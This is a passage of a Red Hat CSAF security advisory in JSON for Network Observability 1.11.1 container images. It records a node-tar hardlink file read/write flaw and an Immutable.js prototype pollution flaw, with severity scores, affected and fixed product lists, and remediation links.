"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2441253"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in node-tar. An attacker can craft a malicious archive that, when extracted with default options, creates a hardlink outside the intended extraction directory. This vulnerability allows the attacker to perform arbitrary file read and write operations as the user extracting the archive, bypassing existing path protections. This can lead to unauthorized access and modification of sensitive system files.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In Red Hat environments, this condition introduces a significant constraint, as exploitation requires user interaction and reliance on unsafe handling of externally supplied archives. The attack is not remotely exploitable in isolation and depends on a user or service processing attacker-controlled input.\n\nFurthermore, the impact of the vulnerability is limited to the privileges of the extracting process. In typical Red Hat deployments, archive extraction is performed by non-privileged users or within confined environments such as containers or restricted service contexts, which limits the scope of potential damage.\n\nRed Hat analysis also notes that this issue does not provide a direct mechanism for code execution or privilege escalation, but rather enables file system manipulation within the boundaries of the executing user\u2019s permissions.\n\nGiven the requirement for user-assisted exploitation, the absence of a direct remote attack vector, and the confinement of impact to the privileges of the extracting process, Red Hat considers the practical risk to be lower than the generalized NVD assessment. As a result, this vulnerability is classified as Moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x"
],
"known_not_affected": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26960"
},
{
"category": "external",
"summary": "RHBZ#2441253",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441253"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26960",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26960"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26960",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26960"
},
{
"category": "external",
"summary": "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384",
"url": "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384"
},
{
"category": "external",
"summary": "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f",
"url": "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f"
},
{
"category": "external",
"summary": "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx",
"url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx"
}
],
"release_date": "2026-02-20T01:07:52.979000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T07:50:38+00:00",
"details": "For details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6428"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation"
},
{
"cve": "CVE-2026-29063",
"cwe": {
"id": "CWE-915",
"name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
},
"discovery_date": "2026-03-06T19:00:57.982727+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445291"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Immutable.js, a library for persistent immutable data structures. This vulnerability, known as Prototype Pollution, allows an attacker with low privileges to inject unwanted properties into core JavaScript object prototypes without user interaction. By manipulating specific APIs such as mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject(), a remote attacker could potentially execute arbitrary code or cause a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "immutable-js: Immutable.js: Arbitrary code execution via Prototype Pollution",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this vulnerability requires that an attacker is able to provide arbitrary data to clients of this library in a way that calls the affected functions with data the attacker controls. In most deployments, the ability to provide data in this fashion requires that an attacker has some degree of privileges to access the affected applications.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
